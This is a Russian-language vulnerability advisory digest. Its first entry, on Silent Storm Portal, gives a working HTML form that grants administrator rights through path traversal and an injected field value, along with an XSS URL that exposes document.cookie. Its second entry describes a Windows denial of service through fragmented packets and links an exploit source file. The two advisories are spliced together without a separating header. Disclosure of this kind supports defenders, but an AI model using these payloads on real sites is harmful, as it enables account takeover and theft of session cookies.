Несколько уязвимостей в Silent Storm Portal

Описание: Несколько уязвимостей обнаружено в Silent Storm Portal. Удаленный пользователь может получить административные привилегии на целевом приложении. Удаленный пользователь может также выполнить XSS нападение.

Создание новой учетной записи с административными привилегиями:

<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>

http://[target]/index.php?module=%3Cscript%20language=javascript%3Ewindow.a lert%28document.cookie%29;%3C/script%3E

URL производителя: http://www.silent-storm.co.uk/ssp/index.php?module=../../Home

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Программа: Windows 2000/XP

Опасность: Низкая

Наличие эксплоита: Да

Описание: Несколько вариантов некоторых известных уязвимостей в Windows могут эксплуатироваться удаленным пользователем, чтобы вызвать отказ в обслуживании.

Ошибка обнаружена в обработке фрагментированных пакетов. Удаленный пользователь может послать большое число небольших фрагментированных пакетов, в которых пропущены некоторые пакеты и затем постоянно посылать последний фрагмент, чтобы заставить уязвимую систему использовать 100 CPU и перестать обрабатывать легитимные фрагментированные пакеты.

Пример/Эксплоит: http://digital.net/~gandalf/rose.c

URL производителя: http://www.Microsoft.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.